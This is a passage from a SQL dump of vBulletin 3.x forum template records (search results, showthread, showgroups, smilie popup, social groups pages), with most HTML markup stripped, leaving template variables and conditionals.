\r\n \r\n\r\n \r\n $vbphrase[show_results_as] \r\n \r\n $vbphrase[threads] \r\n $vbphrase[posts] \r\n
\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[search_by_tag] \r\n \r\n
$vbphrase[tag]:
\r\n
\r\n\r\n
\r\n \r\n \r\n \r\n \r\n
\r\n \r\n \r\n\r\n \r\n $vbphrase[search_in_forums] \r\n \r\n
\r\n \r\n $vbphrase[search_all_open_forums] \r\n $vbphrase[search_subscribed_forums] \r\n $searchforumbits\r\n \r\n
\r\n
$vbphrase[also_search_in_child_forums]
\r\n
$vbphrase[you_can_only_search_thread_titles] \r\n
\r\n \r\n \r\n \r\n \r\n
\r\n
\r\n\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n\r\n \r\n \r\n $vbphrase[save_search_preferences] \r\n $vbphrase[clear_search_preferences] \r\n \r\n \r\n \r\n \r\n \r\n
\r\n \r\n\r\n \r\n\r\n\r\n $tag_cloud
\r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1213274609, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1549, -1, 'search_results', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[search_results] \r\n\".(($show[\'inlinemod\']) ? (\"\") : (\"\")).\"\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$template_hook[search_results_top]\r\n\r\n\".(($pagenav) ? (\"\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n\r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n\r\n\r\n$searchbits\r\n\r\n\r\n\r\n\".(($pagenav) ? (\"\r\n\r\n\r\n \".(($pagenav) ? (\"$pagenav \") : (\"\")).\"\r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'ajax_js\'] AND $show[\'results\'] AND !$search[\'showposts\']) ? (\"\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'inlinemod\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n \r\n\r\n$template_hook[search_results_bottom]\r\n\r\n\r\n\r\n \r\n $forumjump \r\n \r\n
\r\n\r\n\".(($show[\'inlinemod\'] AND $show[\'popups\']) ? (\"\r\n \r\n\") : (\"\")).\"\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[search_results] \r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$template_hook[search_results_top]\r\n\r\n\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n$searchbits\r\n\r\n\r\n\r\n\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n$template_hook[search_results_bottom]\r\n\r\n\r\n\r\n \r\n $forumjump \r\n \r\n
\r\n\r\n\r\n \r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1223077314, 'vBulletin Solutions', '3.8.0 Alpha 2', 'vbulletin'),
(1550, -1, 'search_results_postbit', '\r\n\r\n \r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n $vbphrase[forum]: session->vars[\'sessionurl\'] . \"f=$post[forumid]\\\">$post[forumtitle] \r\n \r\n \r\n $post[postdate]\".((!$show[\'detailedtime\']) ? (\", $post[posttime]\") : (\"\")).\"\r\n \r\n \r\n\r\n \".(($show[\'moderated\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n $vbphrase[replies]: $post[replycount] \r\n
\r\n \r\n \r\n $vbphrase[views]: $post[views] \r\n
\r\n \r\n\r\n \r\n\r\n \".(($show[\'moderated\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'deleted\']) ? (\"\r\n \r\n \r\n \" . construct_phrase(\"$post[del_phrase]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$post[del_userid]\", \"$post[del_username]\") . \"\r\n \".(($post[\'del_reason\']) ? (\"$vbphrase[reason]: $post[del_reason] \") : (\"\")).\"\r\n
\r\n \") : (\"\")).\"\r\n \r\n \r\n
', '\r\n\r\n \r\n \r\n disabled=\"disabled\" />\r\n \r\n \r\n $vbphrase[forum]: $post[forumtitle] \r\n \r\n \r\n $post[postdate], $post[posttime] \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[replies]: $post[replycount] \r\n
\r\n \r\n \r\n $vbphrase[views]: $post[views] \r\n
\r\n \r\n\r\n \r\n\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n
$post[del_phrase] \r\n
$vbphrase[reason]: $post[del_reason] \r\n
\r\n \r\n \r\n \r\n
', 'template', 1233751411, 'vBulletin Solutions', '3.8.2', 'vbulletin'),
(1551, -1, 'search_results_postbit_lastvisit', '\r\n\r\n $vbphrase[all_posts_below_here] \r\n \r\n
', '\r\n\r\n $vbphrase[all_posts_below_here] \r\n \r\n
', 'template', 1149792002, 'vBulletin Solutions', '3.6.0 Beta 2', 'vbulletin'),
(1552, -1, 'SHOWGROUPS', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[show_groups] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($moderatorbits) ? (\"\r\n\r\n\r\n\r\n $vbphrase[moderators] \r\n \r\n\r\n \r\n $vbphrase[username]\".(($show[\'locationfield\']) ? (\" / $vbphrase[location_perm]\") : (\"\")).\" \r\n $vbphrase[forums] \r\n \".(($show[\'contactinfo\']) ? (\"$vbphrase[contact] \") : (\"\")).\"\r\n \r\n$moderatorbits\r\n
\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n$usergroups\r\n\r\n\r\n\r\n \r\n $forumjump \r\n \r\n
\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[show_groups] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n\r\n $vbphrase[moderators] \r\n \r\n\r\n \r\n $vbphrase[username] / $vbphrase[location_perm] \r\n $vbphrase[forums] \r\n $vbphrase[contact] \r\n \r\n$moderatorbits\r\n
\r\n \r\n\r\n \r\n\r\n$usergroups\r\n\r\n\r\n\r\n \r\n $forumjump \r\n \r\n
\r\n\r\n$footer\r\n\r\n', 'template', 1231162002, 'vBulletin Solutions', '3.8.0 Release Candidate 3', 'vbulletin'),
(1553, -1, 'showgroups_forumbit', 'session->vars[\'sessionurl\'] . \"f=$forumid\\\">$forumtitle ', '$forumtitle ', 'template', 1069772461, 'vBulletin Solutions', '', 'vbulletin'),
(1554, -1, 'showgroups_usergroup', '\r\n\r\n $user[title] \r\n \r\n\r\n \r\n $vbphrase[user_name]\".(($show[\'locationfield\']) ? (\" / $vbphrase[location_perm]\") : (\"\")).\" \r\n \".(($show[\'contactinfo\']) ? (\"$vbphrase[contact] \") : (\"\")).\"\r\n \r\n$usergroupbits\r\n
\r\n \r\n', '\r\n\r\n $user[title] \r\n \r\n\r\n \r\n $vbphrase[user_name] / $vbphrase[location_perm] \r\n $vbphrase[contact] \r\n \r\n$usergroupbits\r\n
\r\n \r\n', 'template', 1231161696, 'vBulletin Solutions', '3.8.0 Release Candidate 3', 'vbulletin'),
(1555, -1, 'showgroups_usergroupbit', '\r\n $user[onlinestatus] \r\n \r\n session->vars[\'sessionurl\'] . \"u=$user[userid]\\\">$user[musername] \r\n \".(($show[\'locationfield\'] AND $user[\'field2\']) ? (\"$user[field2]
\") : (\"\")).\"\r\n \r\n \".(($showforums) ? (\"\r\n $user[forumbits]
\r\n \") : (\"\")).\"\r\n \".(($show[\'contactinfo\']) ? (\"\r\n \r\n \".(($show[\'pmlink\']) ? (\"session->vars[\'sessionurl\'] . \"do=newpm&u=$user[userid]\\\" rel=\\\"nofollow\\\"> \") : (\"\")).\"\r\n \".(($show[\'emaillink\']) ? (\"session->vars[\'sessionurl\'] . \"do=mailmember&u=$user[userid]\\\" rel=\\\"nofollow\\\"> \") : (\"\")).\"\r\n \r\n \") : (\"\")).\"\r\n ', '\r\n $user[onlinestatus] \r\n \r\n $user[musername] \r\n $user[field2]
\r\n \r\n \r\n $user[forumbits]
\r\n \r\n \r\n \r\n $vbphrase[send_private_message_to_x]\" border=\"0\" /> \r\n $vbphrase[send_message_via_email_to_x]\" border=\"0\" /> \r\n \r\n \r\n ', 'template', 1231161424, 'vBulletin Solutions', '3.8.0 Release Candidate 3', 'vbulletin'),
(1556, -1, 'SHOWTHREAD', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $thread[prefix_plain_html] $thread[title]\".(($pagenumber>1) ? (\" - \" . construct_phrase(\"$vbphrase[page_x]\", \"$pagenumber\") . \"\") : (\"\")).\" - \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" \r\n \r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$poll\r\n\r\n\".(($show[\'inlinemod\']) ? (\"\r\n$spacer_close\r\n\r\n$spacer_open\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\".(($show[\'inlinemod\'] AND $show[\'popups\']) ? (\"\r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n$spacer_close\r\n\r\n\r\n\".(($show[\'threadedmode\'] OR $show[\'hybridmode\']) ? (\"\r\n\r\n$threadlist\r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'reputation\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\r\n$spacer_open\r\n\r\n\r\n\r\n\r\n\r\n\r\n\".(($show[\'inlinemod\']) ? (\"\r\n$spacer_close\r\n \r\n$spacer_open\r\n\") : (\"\")).\"\r\n\r\n\".(($bookmarksites) ? (\"\r\n\r\n \r\n \r\n \r\n $vbphrase[bookmarks] \r\n \r\n \r\n
\r\n \r\n
\r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'tag_box\']) ? (\"\r\n\r\n \r\n \r\n\r\n \r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n$ad_location[ad_showthread_beforeqr]\r\n\r\n\".(($show[\'lightbox\']) ? (\"\r\n\r\n \r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'multiquote_global\']) ? (\"\r\n\r\n \r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'quickreply\'] OR $show[\'ajax_js\']) ? (\"\r\n\r\n \r\n\r\n\r\n\r\n $vBeditTemplate[clientscript]\r\n \".(($show[\'quickedit\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n\".(($show[\'quickreply\']) ? (\"\r\n\r\n \r\n \r\n options[\'postminchars\'] . \");\\\" id=\\\"qrform\\\">\r\n \r\n \r\n\r\n \".((!is_browser(\'ie\') AND $show[\'wysiwyg\']) ? (\"\r\n \r\n
\r\n \") : (\"\")).\"\r\n\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'next_prev_links\']) ? (\"\r\n\r\n \r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'activeusers\']) ? (\"\r\n\r\n \r\n \r\n \r\n \r\n \" . construct_phrase(\"$vbphrase[users_viewing_this_thread_x_y_z]\", \"$totalonline\", \"$numberregistered\", \"$numberguest\") . \"\r\n \r\n \r\n \r\n \r\n $activeusers \r\n \r\n \r\n
\r\n\r\n\") : (\"\")).\"\r\n\r\n$template_hook[showthread_after_activeusers]\r\n\r\n\".(($show[\'popups\']) ? (\"\r\n\r\n \r\n\r\n\r\n\r\n\r\n\".(($GLOBALS[\'vbulletin\']->options[\'allowthreadedmode\']) ? (\"\r\n\r\n\r\n\r\n\r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n\".(($show[\'search\']) ? (\"\r\n\r\n\r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\".(($show[\'threadrating\']) ? (\"\r\n \r\n \r\n \r\n\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n\") : (\"\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\")).\"\r\n\r\n\r\n\r\n\r\n \r\n $forumrules\r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n\r\n \r\n\r\n$similarthreads\r\n\r\n$footer\r\n\r\n\r\n\r\n \r\n \".(($show[\'ratethread\']) ? (\"\r\n \r\n \") : (\"\r\n \".(($show[\'threadrating\']) ? (\"\r\n $vbphrase[you_rated_this_thread]: $threadinfo[vote] \r\n \") : (\"\")).\"\r\n \")).\"\r\n \r\n
\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $thread[prefix_plain_html] $thread[title]1\"> - $vbphrase[page_x] - $vboptions[bbtitle] \r\n \r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$poll\r\n\r\n\r\n$spacer_close\r\n\r\n$spacer_open\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n $pagenav \r\n \r\n
\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n$spacer_close\r\n\r\n\r\n\r\n\r\n$threadlist\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n$spacer_open\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n$spacer_close\r\n\r\n$spacer_open\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[bookmarks] \r\n \r\n \r\n
\r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[tags] \r\n \r\n \r\n \r\n $tag_list \r\n \r\n
\r\n\r\n \r\n \r\n\r\n \r\n\r\n$ad_location[ad_showthread_beforeqr]\r\n\r\n\r\n\r\n \r\n \r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n $vBeditTemplate[clientscript]\r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n
\r\n \r\n\r\n \r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n $vbphrase[users_viewing_this_thread_x_y_z] \r\n \r\n \r\n \r\n \r\n $activeusers \r\n \r\n \r\n
\r\n\r\n \r\n\r\n$template_hook[showthread_after_activeusers]\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n $forumrules\r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n\r\n \r\n\r\n$similarthreads\r\n\r\n$footer\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[you_rated_this_thread]: $threadinfo[vote] \r\n \r\n \r\n \r\n
\r\n\r\n\r\n', 'template', 1231342385, 'vBulletin Solutions', '3.8.0 Release Candidate 3', 'vbulletin'),
(1557, -1, 'showthread_bookmarksite', '\r\n \".(($bookmarksite[\'iconpath\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n $bookmarksite[title] \r\n ', '\r\n \r\n $vbphrase[submit_thread_to_x]\" class=\"inlineimg\" /> \r\n \r\n $bookmarksite[title] \r\n ', 'template', 1209402145, 'vBulletin Solutions', '3.7.0', 'vbulletin'),
(1558, -1, 'showthread_list', '\r\n\r\n\r\n\r\n$spacer_open\r\n\r\n\r\n\r\n \r\n \r\n
\r\n \r\n\r\n \r\n
\r\n
\r\n \r\n \r\n\".(($threadedmode==1) ? (\"\r\n\r\n \r\n \r\n\") : (\"\")).\"\r\n
\r\n\r\n$spacer_close', '\r\n\r\n\r\n\r\n$spacer_open\r\n\r\n\r\n\r\n \r\n width:$postlistwidth; overflow:auto; border:2px inset; padding: 0px; text-align:$stylevar[left];\" class=\"alt1\" id=\"links\">\r\n
\r\n \r\n\r\n \r\n
\r\n
\r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n
\r\n\r\n$spacer_close', 'template', 1249925816, 'vBulletin Solutions', '3.8.4', 'vbulletin'),
(1559, -1, 'showthread_quickreply', '\".(($show[\'editor_toolbar\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\r\n
\r\n \".(($show[\'qr_require_click\']) ? (\"\r\n $vbphrase[click_quick_reply_icon] \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n \r\n\r\n\r\n \r\n session->vars[\'styleid\'] . \"\\\" />\r\n\r\n', '\r\n\r\n \r\n\r\n
\r\n \r\n $vbphrase[click_quick_reply_icon] \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n', 'template', 1238581441, 'vBulletin Solutions', '3.8.3', 'vbulletin'),
(1560, -1, 'SHOWTHREAD_SHOWPOST', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[view_single_post] - $threadinfo[prefix_plain_html] $threadinfo[title] \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[view_single_post]\r\n \r\n \r\n
\r\n\r\n\".(($show[\'reputation\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\r\n$postbits\r\n\r\n\r\n\r\n \r\n\r\n\".(($show[\'lightbox\']) ? (\"\r\n\r\n \r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[view_single_post] - $threadinfo[prefix_plain_html] $threadinfo[title] \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[view_single_post]\r\n \r\n \r\n
\r\n\r\n\r\n\r\n \r\n\r\n$postbits\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n', 'template', 1195729858, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1561, -1, 'showthread_similarthreadbit', '\r\n \r\n \".(($simthread[\'issubscribed\']) ? (\" \") : (\"\")).\"\r\n $simthread[prefix_rich] session->vars[\'sessionurl\'] . \"t=$simthread[threadid]\\\" title=\\\"$simthread[preview]\\\">$simthread[title] \r\n \r\n $simthread[postusername] \r\n $simthread[forumtitle] \r\n $simthread[replycount] \r\n $simthread[lastreplydate] $simthread[lastreplytime] \r\n \r\n', '\r\n \r\n \r\n $simthread[prefix_rich] $simthread[title] \r\n \r\n $simthread[postusername] \r\n $simthread[forumtitle] \r\n $simthread[replycount] \r\n $simthread[lastreplydate] $simthread[lastreplytime] \r\n \r\n', 'template', 1189606012, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1562, -1, 'showthread_similarthreads', '\r\n\r\n \r\n \r\n \r\n $vbphrase[similar_threads] \r\n \r\n \r\n \r\n\r\n\r\n $vbphrase[thread] \r\n $vbphrase[thread_starter] \r\n $vbphrase[forum] \r\n $vbphrase[replies] \r\n $vbphrase[last_post] \r\n \r\n$similarthreadbits\r\n \r\n
\r\n\r\n ', '\r\n\r\n \r\n \r\n \r\n $vbphrase[similar_threads] \r\n \r\n \r\n \r\n\r\n\r\n $vbphrase[thread] \r\n $vbphrase[thread_starter] \r\n $vbphrase[forum] \r\n $vbphrase[replies] \r\n $vbphrase[last_post] \r\n \r\n$similarthreadbits\r\n \r\n
\r\n\r\n ', 'template', 1125489810, 'vBulletin Solutions', '3.5.0 Release Candidate 3', 'vbulletin'),
(1563, -1, 'smiliepopup', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n $vbphrase[smilie_list] - \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" \r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n \r\n $vbphrase[smilie_list]\r\n $vbphrase[click_a_smilie_to_insert_it_into_your_message]
\r\n \r\n \r\n$smiliebits\r\n\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n $vbphrase[smilie_list] - $vboptions[bbtitle] \r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n \r\n $vbphrase[smilie_list]\r\n $vbphrase[click_a_smilie_to_insert_it_into_your_message]
\r\n \r\n \r\n$smiliebits\r\n\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n\r\n', 'template', 1195729858, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1564, -1, 'smiliepopup_category', '\r\n $category
\r\n \r\n', '\r\n $category
\r\n \r\n', 'template', 1069099452, 'vBulletin Solutions', '', 'vbulletin'),
(1565, -1, 'smiliepopup_row', '\r\n$smiliecells\r\n \r\n', '\r\n$smiliecells\r\n \r\n', 'template', 1069099457, 'vBulletin Solutions', '', 'vbulletin'),
(1566, -1, 'smiliepopup_smilie', '$smiliehtml \r\n$smilie[text] ', '$smiliehtml \r\n$smilie[text] ', 'template', 1118866827, 'vBulletin Solutions', '3.5.0 Beta 2', 'vbulletin'),
(1567, -1, 'smiliepopup_straggler', '$smiliehtml \r\n$smilie[text] ', '$smiliehtml \r\n$smilie[text] ', 'template', 1118866819, 'vBulletin Solutions', '3.5.0 Beta 2', 'vbulletin'),
(1568, -1, 'SOCIALGROUPS', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle \r\n$socialgroups_css\r\n\r\n\r\n$header\r\n$navbar\r\n\r\nsession->vars[\'sessionurl\'] . \"do=grouplist\\\" method=\\\"post\\\">\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n \r\n\r\n\r\n \".(($pagenav) ? (\"\r\n
\r\n $pagenav\r\n
\r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'creategroup\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n
\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $custompagetitle \r\n$socialgroups_css\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n\r\n
\r\n \r\n $pagenav\r\n
\r\n \r\n\r\n
\r\n \r\n \r\n
\r\n\r\n$footer\r\n\r\n', 'template', 1234874426, 'vBulletin Solutions', '3.8.2', 'vbulletin'),
(1569, -1, 'socialgroups_accepttransfer', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle \r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n \r\n \r\n $vbphrase[transfer_group_ownership] \r\n \r\n \r\n \r\n \" . construct_phrase(\"$vbphrase[accept_social_group_transfer_x]\", \"$group[name]\") . \"\r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vboptions[bbtitle] - $custompagetitle \r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n \r\n \r\n $vbphrase[transfer_group_ownership] \r\n \r\n \r\n \r\n $vbphrase[accept_social_group_transfer_x] \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n$footer\r\n\r\n', 'template', 1237458622, 'vBulletin Solutions', '3.8.2', 'vbulletin'),
(1570, -1, 'socialgroups_addpictures', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$messages\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n $vbphrase[add_pictures_to_group] \r\n \r\n\r\n \r\n \r\n
\r\n \" . construct_phrase(\"$vbphrase[may_add_pictures_group_paste_url]\", \"album.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=\" . $GLOBALS[\'vbulletin\']->userinfo[\'userid\'] . \"\") . \"\r\n
\r\n $vbphrase[picture_urls]:
$vbphrase[one_url_per_line_paren] \r\n
\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n \r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vboptions[bbtitle] - $custompagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$messages\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n $vbphrase[add_pictures_to_group] \r\n \r\n\r\n \r\n \r\n
\r\n
$vbphrase[may_add_pictures_group_paste_url] \r\n
\r\n $vbphrase[picture_urls]:
$vbphrase[one_url_per_line_paren] \r\n
\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n \r\n\r\n$footer\r\n\r\n', 'template', 1218117371, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1571, -1, 'socialgroups_addpicture_invalidurl', '\" . construct_phrase(\"$vbphrase[following_urls_invalid_picture_not_found]\", \"album.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=\" . $GLOBALS[\'vbulletin\']->userinfo[\'userid\'] . \"\") . \"\r\n\r\n ', '$vbphrase[following_urls_invalid_picture_not_found] \r\n\r\n ', 'template', 1195493956, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1572, -1, 'socialgroups_addpicture_messagebit', '$message_text
\r\n\".(($picturebits) ? (\"$picturebits\") : (\"\")).\" \r\n', '$message_text
\r\n$picturebits \r\n', 'template', 1196261134, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1573, -1, 'socialgroups_addpicture_messages', '\r\n\r\n $vbphrase[vbulletin_message] \r\n \r\n\r\n \r\n \r\n \r\n \r\n
\r\n ', '\r\n\r\n $vbphrase[vbulletin_message] \r\n \r\n\r\n \r\n \r\n \r\n \r\n
\r\n ', 'template', 1198870190, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'),
(1574, -1, 'socialgroups_categorylist', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle \r\n$socialgroups_css\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n \r\n $vbphrase[social_group_categories]\r\n \r\n \r\n\r\n $template_hook[group_categorylist_start_col]\r\n \r\n $vbphrase[category_name] $sortarrow[title]\r\n \r\n \r\n $vbphrase[groups] $sortarrow[groups]\r\n \r\n $template_hook[group_categorylist_end_col]\r\n \r\n$categorybits\r\n\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n \".(($pagenav) ? (\"\r\n
\r\n $pagenav\r\n
\r\n \") : (\"\")).\"\r\n
\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $custompagetitle \r\n$socialgroups_css\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n \r\n $vbphrase[social_group_categories]\r\n \r\n \r\n\r\n $template_hook[group_categorylist_start_col]\r\n \r\n $vbphrase[category_name] $sortarrow[title]\r\n \r\n \r\n $vbphrase[groups] $sortarrow[groups]\r\n \r\n $template_hook[group_categorylist_end_col]\r\n \r\n$categorybits\r\n\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n
\r\n \r\n $pagenav\r\n
\r\n \r\n
\r\n\r\n$footer\r\n\r\n', 'template', 1218628241, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1575, -1, 'socialgroups_categorylist_bit', '\r\n $template_hook[group_categorybit_start]\r\n \r\n \r\n $category[description]
\r\n \r\n \r\n session->vars[\'sessionurl\'] . \"cat=$category[categoryid]\\\">$category[groups] \r\n \r\n $template_hook[group_categorybit_end]\r\n ', '\r\n $template_hook[group_categorybit_start]\r\n \r\n \r\n $category[description]
\r\n \r\n \r\n $category[groups] \r\n \r\n $template_hook[group_categorybit_end]\r\n ', 'template', 1218628137, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
